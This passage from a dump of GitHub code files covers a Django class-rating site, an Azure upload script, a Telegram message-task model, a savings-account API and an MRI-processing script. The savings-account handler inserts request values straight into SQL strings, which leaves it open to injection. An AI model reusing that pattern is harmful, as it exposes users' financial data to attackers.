request.POST['add_assignment_type'] == \"test\":\n\t\t\t\t\t\tassignment.test = True\n\t\t\t\t\tassignment.due_date = request.POST['add_assignment_due_date']\n\t\t\t\t\tassignment.save()\n\t\t\t\t\trating = Rating(rating=int(request.POST['add_assignment_rating']))\n\t\t\t\t\trating.assignment = assignment\n\t\t\t\t\trating.save()\n\t\t\t\t\tratings = assignment.ratings.all()\n\t\t\t\t\tprev_ratings = list(ratings)\n\t\t\t\t\tprev_ratings.append(rating)\n\t\t\t\t\tassignment.ratings = prev_ratings\n\t\t\t\t\tassignment.avg_rating = rating.rating\n\t\t\t\t\tassignment.num_ratings = 1\n\t\t\t\t\t\n\t\t\t\t\tchart_data = [0, 0, 0, 0, 0]\n\t\t\t\t\tfor time in prev_ratings:\n\t\t\t\t\t\tif time.rating == 1:\n\t\t\t\t\t\t\tchart_data[0] += 1\n\t\t\t\t\t\telif time.rating == 2:\n\t\t\t\t\t\t\tchart_data[1] += 1\n\t\t\t\t\t\telif time.rating == 3:\n\t\t\t\t\t\t\tchart_data[2] += 1\n\t\t\t\t\t\telif time.rating == 4:\n\t\t\t\t\t\t\tchart_data[3] += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tchart_data[4] += 1\n\t\t\t\t\tG = VerticalBarStack(chart_data)\n\t\t\t\t\tG.color('3D71A3')\n\t\t\t\t\tG.label('1','2','3','4', '5')\n\t\t\t\t\tG.size(250,125)\n\t\t\t\t\tG.bar(37,15)\n\t\t\t\t\tG.marker('N*','black',0,-1,11)\n\t\t\t\t\tif (max(chart_data) > 10):\n\t\t\t\t\t\tmax_range = max(chart_data) + 4\n\t\t\t\t\telse:\n\t\t\t\t\t\tmax_range = max(chart_data) + 1\n\t\t\t\t\tchart_url = str(G) + '&chds=0,'+str(max_range)+'&chf=bg,s,65432100'\n\t\t\t\t\tassignment.ratings_chart_url = chart_url\n\t\t\t\t\tassignment.save()\n\t\t\t\texcept:\n\t\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Incorrect info submitted\"}, context_instance=RequestContext(request))\n\t\t\telse:\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Assignment needs a name\"}, context_instance=RequestContext(request))\n\t\t\tprev_assignments = list(assignments)\n\t\t\tprev_assignments.append(assignment)\n\t\t\tclasszy.assignments = prev_assignments\n\t\t\tclasszy.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'added': True}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_difficulty_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['add_assignment_difficulty_name'])\n\t\t\trating = Rating(rating=int(request.POST['add_assignment_rating']))\n\t\t\trating.assignment = assignment\n\t\t\trating.save()\n\t\t\tratings = assignment.ratings.all()\n\t\t\tprev_ratings = list(ratings)\n\t\t\tprev_ratings.append(rating)\n\t\t\tassignment.ratings = prev_ratings\n\t\t\tratings_sum = 0\n\t\t\tfor rate in prev_ratings:\n\t\t\t\tratings_sum += rate.rating\n\t\t\tassignment.avg_rating = ratings_sum / len(prev_ratings)\n\t\t\tassignment.num_ratings += 1\n\t\t\t\n\t\t\tchart_data = [0, 0, 0, 0, 0]\n\t\t\tfor time in prev_ratings:\n\t\t\t\tif time.rating == 1:\n\t\t\t\t\tchart_data[0] += 1\n\t\t\t\telif time.rating == 2:\n\t\t\t\t\tchart_data[1] += 1\n\t\t\t\telif time.rating == 3:\n\t\t\t\t\tchart_data[2] += 1\n\t\t\t\telif time.rating == 
4:\n\t\t\t\t\tchart_data[3] += 1\n\t\t\t\telse:\n\t\t\t\t\tchart_data[4] += 1\n\t\t\tG = VerticalBarStack(chart_data)\n\t\t\tG.color('3D71A3')\n\t\t\tG.label('1','2','3','4', '5')\n\t\t\tG.size(250,125)\n\t\t\tG.bar(37,15)\n\t\t\tG.marker('N*','black',0,-1,11)\n\t\t\tif (max(chart_data) > 10):\n\t\t\t\tmax_range = max(chart_data) + 4\n\t\t\telse:\n\t\t\t\tmax_range = max(chart_data) + 1\n\t\t\tchart_url = str(G) + '&chds=0,'+str(max_range)+'&chf=bg,s,65432100'\n\t\t\tassignment.ratings_chart_url = chart_url\n\t\t\tassignment.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"New rating added\", 'details' : True}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_time_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['add_assignment_time_name'])\n\t\t\ttime = Time(time=int(request.POST['add_assignment_time']))\n\t\t\ttime.assignment = assignment\n\t\t\ttime.save()\n\t\t\ttimes = assignment.times.all()\n\t\t\tprev_times = list(times)\n\t\t\tprev_times.append(time)\n\t\t\tassignment.times = prev_times\n\t\t\tassignment.num_times += 1\n\t\t\ttime_array = []\n\t\t\tfor time in prev_times:\n\t\t\t\ttime_array.append(time.time)\n\t\t\t\tif assignment.min_time == 0 or time.time < assignment.min_time:\n\t\t\t\t\tassignment.min_time = time.time\n\t\t\t\tif assignment.max_time == 0 or time.time > assignment.max_time:\n\t\t\t\t\tassignment.max_time = time.time\n\t\t\tassignment.avg_time = str(numpy.average(time_array))\n\t\t\tassignment.std_time = str(numpy.std(time_array))\n\t\t\t\n\t\t\tchart_data = [0, 0, 0, 0]\n\t\t\tfor time in prev_times:\n\t\t\t\tif (time.time < 10):\n\t\t\t\t\tchart_data[0] += 1\n\t\t\t\telif (time.time < 20):\n\t\t\t\t\tchart_data[1] += 1\n\t\t\t\telif (time.time < 30):\n\t\t\t\t\tchart_data[2] += 1\n\t\t\t\telse:\n\t\t\t\t\tchart_data[3] += 1\n\t\t\tG = VerticalBarStack(chart_data)\n\t\t\tG.color('3D71A3')\n\t\t\tG.label('0-9','10-19','20-29','30 plus')\n\t\t\tG.size(250,125)\n\t\t\tG.bar(50,15)\n\t\t\tG.marker('N*','black',0,-1,11)\n\t\t\tif (max(chart_data) > 10):\n\t\t\t\tmax_range = max(chart_data) + 4\n\t\t\telse:\n\t\t\t\tmax_range = max(chart_data) + 1\n\t\t\tchart_url = str(G) + '&chds=0,'+str(max_range)+'&chf=bg,s,65432100'\n\t\t\tassignment.chart_url = chart_url\n\t\t\tassignment.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"New time added\"}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_comment_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['add_assignment_comment_name'])\n\t\t\tif 'comment_text' in request.POST and request.POST['comment_text'] != \"\" and 'comment_name' in request.POST and request.POST['comment_name'] != \"\":\n\t\t\t\tcomment = Comment(name=request.POST['comment_name'],comment=request.POST['comment_text'])\n\t\t\t\tcomment.assignment = assignment\n\t\t\t\tcomment.save()\n\t\t\t\tcomments = assignment.comments.all()\n\t\t\t\tprev_comments = 
list(comments)\n\t\t\t\tprev_comments.append(comment)\n\t\t\t\tassignment.comments = prev_comments\n\t\t\t\tassignment.latest_comment_name = request.POST['comment_name']\n\t\t\t\tassignment.latest_comment_text = request.POST['comment_text']\n\t\t\t\tassignment.save()\n\t\t\telse:\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Cannot leave empty comment\"}, context_instance=RequestContext(request))\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"New comment added\"}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'delete_assignment_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['delete_assignment_name'])\t\n\t\t\tdelete = Delete_Queue(title=\"Someone asked to delete \" + classzy.code + \" : \" + assignment.name)\n\t\t\tdelete.save()\n\t\t\tassignment.delete = True\n\t\t\tassignment.delete_queue = delete\n\t\t\tassignment.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Deletion notice has been sent to admins.\"}, context_instance=RequestContext(request))\n\t\t\t\n\treturn render_to_response('index.html', context_instance=RequestContext(request))\n","repo_name":"imkevinxu/classzy","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43327572352","text":"import os\nimport sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nfrom set_up_aml.util import _establish_connection_to_aml_workspace\nimport torch\n\ndef upload_file(path_to_local_file,path_to_blob):\n    try:\n        ws=_establish_connection_to_aml_workspace()\n    except Exception as e:\n        print(\"failed to connect to workspace\")\n        raise e\n    try:\n        default_data_store=ws.get_default_datastore()\n        default_data_store.upload_files(files=path_to_local_file,\n                                        target_path=path_to_blob,\n                                        overwrite=True)\n    except Exception as e:\n        print(\"failed to upload\")\n        raise e\n\nif __name__ == \"__main__\":\n    try:\n        dummy_data=torch.randn(256,10)\n        torch.save(dummy_data,'dummy_data_file')\n        upload_file([\"dummy_data_file\"],\"dummy\")\n    except Exception as e:\n        print(e)","repo_name":"admin822/Azure_Machine_Learning_How_to_Use","sub_path":"upload_data/upload_to_datastore.py","file_name":"upload_to_datastore.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45628851376","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nfrom model.dbconf import db\nfrom tools.help import getGuid, getTime, setPageing, dictToListJoinDict, toDate\n\n\nclass TaskPrivateLog(db.Model):\n    __tablename__ = 'tg_task_private_log'\n\n    id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    guid = db.Column(db.String(38), unique=True, index=True)\n    task_id = db.Column(db.String(38))\n    user_account_id = db.Column(db.String(38))\n    
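# NOTE: the columns below appear to cache Telegram account metadata\n    # (username, numeric id, access hash, display name, phone) on each log row,\n    # presumably so a send can be replayed without re-querying the accounts table.\n    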
user_account_group_user_id = db.Column(db.String(38))\n soKey = db.Column(db.String(30))\n tg_username = db.Column(db.String(180))\n tg_user_id = db.Column(db.String(180))\n tg_access_hash = db.Column(db.String(180))\n tg_nicename = db.Column(db.String(180))\n tg_phone = db.Column(db.String(180))\n text = db.Column(db.Text)\n status = db.Column(db.Integer, default=1)\n create_time = db.Column(db.Integer, default=10)\n update_time = db.Column(db.Integer, default=10)\n iPage = 1\n\n def __init__(self, guid=None, task_id=None, user_account_id=None, user_account_group_user_id=None, soKey=None,\n tg_username=None, tg_user_id=None, tg_access_hash=None, tg_nicename=None, tg_phone=None, text=None,\n status=1,\n page=1):\n self.guid = guid\n self.task_id = task_id\n self.user_account_id = user_account_id\n self.user_account_group_user_id = user_account_group_user_id\n self.tg_username = tg_username\n self.tg_user_id = tg_user_id\n self.tg_access_hash = tg_access_hash\n self.tg_nicename = tg_nicename\n self.tg_phone = tg_phone\n self.soKey = soKey\n self.text = text\n self.status = status\n self.iPage = page\n\n def getDictionary(self):\n data = {}\n data[\"guid\"] = self.guid\n data[\"task_id\"] = self.task_id\n data[\"user_account_id\"] = self.user_account_id\n data[\"user_account_group_user_id\"] = self.user_account_group_user_id\n data[\"tg_username\"] = self.tg_username\n data[\"tg_user_id\"] = self.tg_user_id\n data[\"tg_access_hash\"] = self.tg_access_hash\n data[\"tg_nicename\"] = self.tg_nicename\n data[\"tg_phone\"] = self.tg_phone\n data[\"soKey\"] = self.soKey\n data[\"text\"] = self.text\n data[\"status\"] = self.status\n return data\n\n def insert(self):\n self.guid = str(getGuid())\n self.status = 1\n self.create_time = getTime()\n self.update_time = getTime()\n db.session.add(self)\n if db.session.commit() == None:\n return self.guid\n else:\n return False\n\n def update(self):\n data = {}\n data[\"text\"] = self.text\n data[\"update_time\"] = getTime()\n user = TaskPrivateLog.query.filter_by(guid=self.guid).update(data)\n if user is not None:\n if self.guid != None:\n return db.session.commit()\n return False\n\n def upStatus(self):\n data = {}\n data[\"status\"] = self.status\n data[\"update_time\"] = getTime()\n user = TaskPrivateLog.query.filter_by(guid=self.guid).update(data)\n if user is not None:\n if self.guid != None:\n return db.session.commit()\n return False\n\n def byListPage(self):\n db.session.commit()\n u = TaskPrivateLog.query.filter_by(task_id=self.task_id).order_by(TaskPrivateLog.id.desc()).paginate(\n page=self.iPage,\n per_page=30)\n items = dictToListJoinDict(u.items)\n u.items = items\n pageList = setPageing(u)\n return pageList\n\n def byGuidDetails(self):\n db.session.commit()\n d = TaskPrivateLog.query.filter_by(guid=self.guid).first()\n detail = {}\n if d != None:\n detail[\"id\"] = d.id\n detail[\"guid\"] = d.guid\n detail[\"task_id\"] = d.task_id\n detail[\"text\"] = d.text\n detail[\"status\"] = d.status\n detail[\"create_time\"] = toDate(d.create_time)\n detail[\"update_time\"] = toDate(d.update_time)\n return detail\n return None\n\n def getTaskListNotPage(self):\n db.session.commit()\n list = TaskPrivateLog.query.filter_by(status=1).all()\n if len(list) >= 1:\n dictList = dictToListJoinDict(list)\n return dictList\n return False\n\n def byGuidDel(self):\n stu = TaskPrivateLog.query.filter(TaskPrivateLog.task_id == self.task_id).delete()\n stuDel = db.session.commit()\n print(stu)\n print(stuDel)\n\n def getSendList(self, limit=0):\n 
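# NOTE: committing before a read is this module's idiom (see byListPage and\n        # byGuidDetails above), apparently to end the current transaction so the\n        # query below sees freshly committed rows.\n        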
db.session.commit()\n        ilist = TaskPrivateLog.query.filter_by(task_id=self.task_id, status=1).order_by(TaskPrivateLog.id.desc()).limit(\n            limit).all()\n        return ilist\n\n    def sendOk(self, guid=None):\n        data = {}\n        data[\"status\"] = 2\n        data[\"update_time\"] = getTime()\n        TaskPrivateLog.query.filter_by(guid=guid).update(data)\n        db.session.commit()\n        return True\n\n    def getByTaskIdCount(self):\n        db.session.commit()\n        count = TaskPrivateLog.query.filter_by(task_id=self.task_id).filter_by(status=2).count()\n        if count:\n            return count\n        return 0\n","repo_name":"x7c7v7i87/telegram-web-action","sub_path":"api/model/task_private_log.py","file_name":"task_private_log.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"31"} +{"seq_id":"16030176042","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nFILEITEM = 0\nFILEGROUP = 1\n\n\nclass FileGroup(Item):\n    items = Field()\n\n\nclass FileItem(Item):\n    url = Field()\n    source = Field()\n    name = Field()\n    state = Field()\n    year = Field()\n    gid = Field()\n    checksum = Field()\n    raw_text = Field()\n\n\ndef default(type):\n    if type == 0:\n        return FileItem(\n            source='',\n            name='',\n            state='',\n            year='',\n            gid=None,\n            checksum='',\n            raw_text=''\n        )\n    elif type == 1:\n        return FileGroup(items=[])\n    else:\n        return None\n","repo_name":"mcialini/tsne","sub_path":"scrapers/scrapers/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25992736218","text":"from Utils.Tools import validations, authorized\nfrom Utils.GeneralTools import run_query, response, response_error\nimport json\nfrom Apis.Clients.ClassClient import ValidateClient\n\n@authorized\ndef list_saving(event, context):\n\n    data = run_query(\"select * from savings_account\", 'get')\n\n    list_client = []\n    for d in data:\n        list_client.append(dict(\n            account_id=d[0], client_id=d[1], account_number=d[2], balance=int(d[3]), activation_date=str(d[4]),\n            city_id=d[5], country_id=d[6], account_status=d[7], user_creates=d[8]\n        ))\n\n    return response(200, \"savings_account list\", list_client)\n\n\n@authorized\ndef create_saving(event, context): \n\n    data = json.loads(event['body'])\n    \n    client_active = ValidateClient.validate_status(data['client_id'])\n    \n    if client_active: \n\n        run_query(\"insert into savings_account(client_id, account_number, balance, activation_date, city_id, country_id, account_status, user_creates) values(\\\n            {}, '{}', {}, now(), {}, {}, 1, {})\".format(data['client_id'], data['account_number'], data['balance'], data['city_id'], data['country_id'], event['user_id']), 'post')\n\n        return response(201, \"savings account created successfully\", data)\n    \n    return response_error(\"inactive or non-existent client\")\n\n\n@authorized\ndef update_saving(event, context):\n\n    data = json.loads(event['body'])\n\n    run_query(\"update savings_account set balance ={}, account_status = {} where account_id ={}\".format(\n        data['balance'], data['account_status'], data['account_id']), 'post')\n\n    return response(200, \"saving account updated successfully\", data)\n\n\n@validations\ndef create_country(event, context):\n\n    data = json.loads(event['body'])\n\n    run_query(\"insert into country(cod_country, name) values({}, '{}')\".format(\n        data['cod_country'], data['name']), 
'post')\n\n    return response(200, \"country created successfully\", data)\n","repo_name":"kevinxavier7/Finance","sub_path":"Handlers/SavingHandler.py","file_name":"SavingHandler.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22177412551","text":"def initParser(subparsers, base_parser):\n  import argparse\n  parser = subparsers.add_parser('msmt_5tt', parents=[base_parser], help='Derive MSMT CSD responses based on a co-registered 5TT image')\n  arguments = parser.add_argument_group('Positional arguments specific to the \\'msmt_5tt\\' algorithm')\n  arguments.add_argument('in_5tt', help='Input co-registered 5TT image')\n  arguments.add_argument('out_gm', help='Output GM response text file')\n  arguments.add_argument('out_wm', help='Output WM response text file')\n  arguments.add_argument('out_csf', help='Output CSF response text file')\n  options = parser.add_argument_group('Options specific to the \\'msmt_5tt\\' algorithm')\n  options.add_argument('-dirs', help='Manually provide the fibre direction in each voxel (a tensor fit will be used otherwise)')\n  options.add_argument('-fa', type=float, default=0.2, help='Upper fractional anisotropy threshold for isotropic tissue (i.e. GM and CSF) voxel selection')\n  options.add_argument('-pvf', type=float, default=0.95, help='Partial volume fraction threshold for tissue voxel selection')\n  options.add_argument('-wm_algo', metavar='algorithm', default='tournier', help='dwi2response algorithm to use for white matter single-fibre voxel selection')\n  parser.set_defaults(algorithm='msmt_5tt')\n  parser.set_defaults(single_shell=False)\n  \n  \n  \ndef checkOutputFiles():\n  import lib.app\n  lib.app.checkOutputFile(lib.app.args.out_gm)\n  lib.app.checkOutputFile(lib.app.args.out_wm)\n  lib.app.checkOutputFile(lib.app.args.out_csf)\n\n\n\ndef getInputFiles():\n  import os\n  import lib.app\n  from lib.runCommand import runCommand\n  runCommand('mrconvert ' + lib.app.args.in_5tt + ' ' + os.path.join(lib.app.tempDir, '5tt.mif'))\n  if lib.app.args.dirs:\n    runCommand('mrconvert ' + lib.app.args.dirs + ' ' + os.path.join(lib.app.tempDir, 'dirs.mif') + ' -stride 0,0,0,1')\n\n\n\ndef execute():\n  import math, os, shutil\n  import lib.app\n  from lib.getHeaderInfo import getHeaderInfo\n  from lib.getImageStat import getImageStat\n  from lib.printMessage import printMessage\n  from lib.runCommand import runCommand\n  from lib.warnMessage import warnMessage\n  from lib.errorMessage import errorMessage\n  \n  # Ideally want to use the oversampling-based regridding of the 5TT image from the SIFT model, not mrtransform\n  # May need to commit 5ttregrid...\n\n  # Verify input 5tt image\n  sizes = [ int(x) for x in getHeaderInfo('5tt.mif', 'size').split() ]\n  datatype = getHeaderInfo('5tt.mif', 'datatype')\n  if not len(sizes) == 4 or not sizes[3] == 5 or not datatype.startswith('Float'):\n    errorMessage('Imported anatomical image ' + os.path.basename(lib.app.args.in_5tt) + ' is not in the 5TT format')\n\n  # Get shell information\n  shells = [ int(round(float(x))) for x in getHeaderInfo('dwi.mif', 'shells').split() ]\n  if len(shells) < 3:\n    warnMessage('Less than three b-value shells; response functions will not be applicable in MSMT CSD algorithm')\n\n  # Get lmax information (if provided)\n  wm_lmax = [ ]\n  if lib.app.args.lmax:\n    wm_lmax = [ int(x.strip()) for x in lib.app.args.lmax.split(',') ]\n    if not len(wm_lmax) == len(shells):\n      errorMessage('Number of manually-defined lmax\\'s (' + 
str(len(wm_lmax)) + ') does not match number of b-value shells (' + str(len(shells)) + ')')\n for l in wm_lmax:\n if l%2:\n errorMessage('Values for lmax must be even')\n if l<0:\n errorMessage('Values for lmax must be non-negative')\n\n runCommand('dwi2tensor dwi.mif - -mask mask.mif | tensor2metric - -fa fa.mif -vector vector.mif')\n if not os.path.exists('dirs.mif'):\n shutil.copy('vector.mif', 'dirs.mif')\n runCommand('mrtransform 5tt.mif 5tt_regrid.mif -template fa.mif -interp linear')\n\n # Tissue masks\n runCommand('mrconvert 5tt_regrid.mif - -coord 3 0 -axes 0,1,2 | mrcalc - ' + str(lib.app.args.pvf) + ' -gt fa.mif ' + str(lib.app.args.fa) + ' -lt -mult mask.mif -mult gm_mask.mif')\n runCommand('mrconvert 5tt_regrid.mif - -coord 3 2 -axes 0,1,2 | mrcalc - ' + str(lib.app.args.pvf) + ' -gt mask.mif -mult wm_mask.mif')\n runCommand('mrconvert 5tt_regrid.mif - -coord 3 3 -axes 0,1,2 | mrcalc - ' + str(lib.app.args.pvf) + ' -gt fa.mif ' + str(lib.app.args.fa) + ' -lt -mult mask.mif -mult csf_mask.mif')\n\n # Revise WM mask to only include single-fibre voxels\n printMessage('Calling dwi2response recursively to select WM single-fibre voxels using \\'' + lib.app.args.wm_algo + '\\' algorithm')\n runCommand('dwi2response -quiet ' + lib.app.args.wm_algo + ' dwi.mif wm_ss_response.txt -mask wm_mask.mif -voxels wm_sf_mask.mif')\n\n # Check for empty masks\n gm_voxels = int(getImageStat('gm_mask.mif', 'count', 'gm_mask.mif'))\n wm_voxels = int(getImageStat('wm_sf_mask.mif', 'count', 'wm_sf_mask.mif'))\n csf_voxels = int(getImageStat('csf_mask.mif', 'count', 'csf_mask.mif'))\n empty_masks = [ ]\n if not gm_voxels:\n empty_masks.append('GM')\n if not wm_voxels:\n empty_masks.append('WM')\n if not csf_voxels:\n empty_masks.append('CSF')\n if empty_masks:\n message = ','.join(empty_masks)\n message += ' tissue mask'\n if len(empty_masks) > 1:\n message += 's'\n message += ' empty; cannot estimate response function'\n if len(empty_masks) > 1:\n message += 's'\n errorMessage(message)\n\n # For each of the three tissues, generate a multi-shell response\n # Since here we're guaranteeing that GM and CSF will be isotropic in all shells, let's use mrstats rather than sh2response (seems a bit weird passing a directions file to sh2response with lmax=0...)\n\n gm_responses = [ ]\n wm_responses = [ ]\n csf_responses = [ ]\n max_length = 0\n\n for index, b in enumerate(shells):\n dwi_path = 'dwi_b' + str(b) + '.mif'\n mean_dwi_path = 'dwi_b' + str(b) + '_mean.mif'\n # dwiextract will now yield a 4D image, even if there's only a single volume in a shell\n runCommand('dwiextract dwi.mif -shell ' + str(b) + ' ' + dwi_path)\n runCommand('mrmath ' + dwi_path + ' mean ' + mean_dwi_path + ' -axis 3')\n gm_mean = float(getImageStat(mean_dwi_path, 'mean', 'gm_mask.mif'))\n csf_mean = float(getImageStat(mean_dwi_path, 'mean', 'csf_mask.mif'))\n gm_responses .append( str(gm_mean * math.sqrt(4.0 * math.pi)) )\n csf_responses.append( str(csf_mean * math.sqrt(4.0 * math.pi)) )\n this_b_lmax_option = ''\n if wm_lmax:\n this_b_lmax_option = ' -lmax ' + str(wm_lmax[index])\n runCommand('amp2sh ' + dwi_path + ' - | sh2response - wm_sf_mask.mif dirs.mif wm_response_b' + str(b) + '.txt' + this_b_lmax_option)\n wm_response = open('wm_response_b' + str(b) + '.txt', 'r').read().split()\n wm_responses.append(wm_response)\n max_length = max(max_length, len(wm_response))\n\n with open('gm.txt', 'w') as f:\n for line in gm_responses:\n f.write(line + '\\n')\n with open('wm.txt', 'w') as f:\n for line in wm_responses:\n line += ['0'] * 
(max_length - len(line))\n f.write(' '.join(line) + '\\n')\n with open('csf.txt', 'w') as f:\n for line in csf_responses:\n f.write(line + '\\n')\n\n shutil.copyfile('gm.txt', os.path.join(lib.app.workingDir, lib.app.args.out_gm))\n shutil.copyfile('wm.txt', os.path.join(lib.app.workingDir, lib.app.args.out_wm))\n shutil.copyfile('csf.txt', os.path.join(lib.app.workingDir, lib.app.args.out_csf))\n\n # Generate output 4D binary image with voxel selections\n runCommand('mrcat gm_mask.mif wm_sf_mask.mif csf_mask.mif voxels.mif -axis 3')\n\n","repo_name":"noxtoby/mrtrix3_14","sub_path":"scripts/src/dwi2response/msmt_5tt.py","file_name":"msmt_5tt.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"22067036382","text":"# -*- coding: UTF-8 -*-\n# @Time : 2022/9/24 20:39\n# @File : pose.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nfrom mmpose.apis import init_model, inference_topdown, inference_bottomup, Pose2DInferencer\nimport os\nimport sys\nimport subprocess\n\n\nclass Pose(object):\n def __init__(self, config_file, checkpoint_file=None, is_bottomup=True, device='cuda:0'):\n if not config_file.endswith('.py'):\n config_file = f'{config_file}.py'\n config_name = config_file.split('.')[0]\n model_folder = os.path.join(os.environ['HOME'], '.antgo', 'models', 'mmpose', config_name)\n if not os.path.exists(model_folder):\n os.makedirs(model_folder)\n\n model_file = os.path.join(model_folder, config_file)\n if not os.path.exists(model_file):\n subprocess.check_call(['mim', 'download', 'mmpose', '--config', config_name, '--dest', model_folder])\n\n if checkpoint_file is None:\n for f in os.listdir(model_folder):\n if f.endswith('.pth'):\n checkpoint_file = f\n break\n assert(checkpoint_file is not None)\n\n config_file = os.path.join(model_folder, config_file)\n checkpoint_file = os.path.join(model_folder, checkpoint_file)\n\n self.model = init_model(config_file, checkpoint_file, device=device) # or device='cuda:0'\n self.is_bottomup = is_bottomup\n\n def __call__(self, *args, **kwargs):\n pose_info = None\n if self.is_bottomup:\n pose_info, = inference_bottomup(self.model, args[0])\n else:\n pose_info, = inference_topdown(self.model, args[0])\n\n keypoints = pose_info.pred_instances.keypoints\n keypoints_scores = pose_info.pred_instances.keypoint_scores\n bboxes = pose_info.pred_instances.bboxes\n return keypoints, keypoints_scores, bboxes\n","repo_name":"jianzfb/antgo","sub_path":"antgo/pipeline/hub/external/mm/pose.py","file_name":"pose.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"438952272","text":"import json\nfrom selenium import webdriver\n\nclass CreateDriver():\n def instance(self):\n data = json.load(open('Config/config.json'))\n browser_info = data['browser']\n url = data['url']\n if browser_info =='firefox':\n driver = webdriver.Firefox()\n elif browser_info == 'chrome':\n chrome_path = 'Drivers/chromedriver.exe'\n driver = webdriver.Chrome(chrome_path)\n # driver.maximize_window()\n driver.implicitly_wait(30)\n driver.get(url)\n return 
driver","repo_name":"skgantayat/Assist_Automation","sub_path":"Util/Create_driver/driver_instance.py","file_name":"driver_instance.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70268510810","text":"from __future__ import with_statement, absolute_import\nimport re\nimport sys\nimport time\nimport sqlalchemy\nfrom math import ceil\nfrom functools import partial\nfrom flask import _request_ctx_stack, abort\nfrom flask.signals import Namespace\nfrom operator import itemgetter\nfrom threading import Lock\nfrom sqlalchemy import orm\nfrom sqlalchemy.orm.exc import UnmappedClassError\nfrom sqlalchemy.orm.mapper import Mapper\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.orm.interfaces import MapperExtension, SessionExtension, \\\n EXT_CONTINUE\nfrom sqlalchemy.interfaces import ConnectionProxy\nfrom sqlalchemy.engine.url import make_url\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.util import to_list\n\n# the best timer function for the platform\nif sys.platform == 'win32':\n _timer = time.clock\nelse:\n _timer = time.time\n\n\n_camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')\n_signals = Namespace()\n\n\nmodels_committed = _signals.signal('models-committed')\nbefore_models_committed = _signals.signal('before-models-committed')\n\n\ndef _create_scoped_session(db, options):\n if options is None:\n options = {}\n return orm.scoped_session(partial(_SignallingSession, db, **options))\n\n\ndef _make_table(db):\n def _make_table(*args, **kwargs):\n if len(args) > 1 and isinstance(args[1], db.Column):\n args = (args[0], db.metadata) + args[1:]\n return sqlalchemy.Table(*args, **kwargs)\n return _make_table\n\n\n\ndef _include_sqlalchemy(obj):\n for module in sqlalchemy, sqlalchemy.orm:\n for key in module.__all__:\n if not hasattr(obj, key):\n setattr(obj, key, getattr(module, key))\n obj.Table = _make_table(obj)\n\n\nclass _DebugQueryTuple(tuple):\n 